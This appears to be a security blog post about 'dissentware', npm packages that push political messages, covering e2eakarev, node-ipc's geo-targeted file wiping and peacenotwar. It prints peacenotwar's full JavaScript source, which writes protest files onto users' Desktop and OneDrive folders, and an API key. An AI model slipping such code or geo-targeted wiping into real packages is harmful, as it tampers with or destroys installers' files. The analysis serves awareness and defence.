Within the ever-changing realm of cybersecurity challenges, an unsettling trend has surfaced, defying the traditional norms of harmful software. Introducing “dissentware” — a term that instills fear in cybersecurity professionals and individuals alike. Unlike conventional malware, dissentware isn’t crafted solely to exploit weaknesses or pilfer confidential data. Instead, it capitalizes on its malicious nature to promote a specific ideological or political stance, ensnaring victims in the midst of virtual activism.
Illustration of Dissentware
One of the latest and most intriguing dissentware instances arises from npm ( HERE ), the infamous JavaScripts repository manager. Specifically, the package named: e2eakarev embodies a straightforward yet notable example of this emerging genre of Unwanted Malicious Software. Upon installation of the package.json by the unsuspecting user through npm install, it orchestrates the installation process as follows:
The file index.js is executed during post-installation steps. The index.js is characterized by the subsequent code:
Essentially, it queries ipgeolocation.io (utilizing the apikey: fa845b4108e34abe981624d400f18a5d ) to verify if the installation is in Israel. If the origin IP address matches the Israeli IP-code database, it directly outputs “PROTEST_MESSAGE” to the console. The printed message can be found within the code (accessible here) for further reading.
Dissentware Diversification
While e2eakarev was a non-destructive piece of Malware, numerous other dissentware instances still function like erasers (refer to this github repo). For instance, node-ipc introduces an intriguing piece of dissentware that erases victims’ files. In cases where individuals use IPs in Russia or Belarus, all their files will be completely wiped with a heart emoji. A 25% probability is manually set initially to give the appearance of a random bug rather than an intentional action. This impacts the package node-ipc from version 10.1.1 up to version 10.1.3. Starting from version 11.0.0 onwards, malicious code is not directly embedded in the package source.
Nevertheless, creations like peacenotwar (here) stand out for their messages and their capability to propagate across external drives or even network drives like OneDrive.
import fs from 'fs';
import find from './service/findFiles.js';
import read from './service/readFile.js';
import { homedir } from 'os';
var Desktops = `${homedir}/Desktop/`;
var OneDrive = `${homedir}/OneDrive/`;
var OneDriveDesktops = `${homedir}/OneDrive/Desktop/`;
var DesktopFileExists=find(Desktops,'WITH-LOVE-FROM-AMERICA.txt');
var OneDriveDesktopFileExists=find(OneDriveDesktops,'WITH-LOVE-FROM-AMERICA.txt');
var OneDriveFileExists=find(OneDrive,'WITH-LOVE-FROM-AMERICA.txt');
function deliverAPeacefulMessage(path,message){
try{
fs.writeFile(
path,
message,
function(err){
//its all good
}
);
}catch(err){
//thats ok
}
}
//let's be polite and only do this once.
//hopefully once is all it takes.
if(!DesktopFileExists?.length&&!OneDriveFileExists?.length&&!OneDriveDesktopFileExists?.length){
var thinkaboutit='WITH-LOVE-FROM-AMERICA.txt';
var WITH_LOVE_FROM_AMERICA=read(`./${thinkaboutit}`);
deliverAPeacefulMessage(`${Desktops}${thinkaboutit}`,WITH_LOVE_FROM_AMERICA);
deliverAPeacefulMessage(`${OneDriveDesktops}${thinkaboutit}`,WITH_LOVE_FROM_AMERICA);
deliverAPeacefulMessage(`${OneDrive}${thinkaboutit}`,WITH_LOVE_FROM_AMERICA);
}
var whatWeWant='♥';
export {
whatWeWant as default,
whatWeWant
}This module will place a peaceful message on your users’ desktops, executed only if it doesn’t already exist out of courtesy. Vulnerable versions of this package may exhibit Unwanted Behavior, generating files on users’ desktops and OneDrive.
Concluding Remarks
As we wrap up our examination of dissentware in 2023, it becomes evident that the landscape of cyber threats is growing more complex and nuanced. The emergence of this unique form of malicious software underscores the dynamic challenges in cybersecurity, surpassing conventional motives of financial incentives or data theft.
The intertwined relationship between technology and activism has forged a new frontier where virtual protests materialize in the guise of code, infiltrating systems with the objective of causing disruption and spreading discord. Although the motives behind dissentware may stem from ideological or political beliefs, the repercussions extend far beyond the digital domain.
As individuals and organizations confront the evolving threat landscape, it’s imperative to adapt strategies and reinforce defenses against this emerging peril. Cybersecurity protocols must evolve to encompass not just the typical concerns of data security and system integrity, but also the socio-political dimensions introduced by dissentware.
In the ongoing battle against dissentware, knowledge remains our strongest tool. By remaining informed and proactive, we can collectively construct a resilient defense against this unique strain of cyber threat, ensuring a safer and more secure digital future for all.
DISCLAIMER: I utilized artificial intelligence to accurately modify and restructure sections of this blog post.
About Author
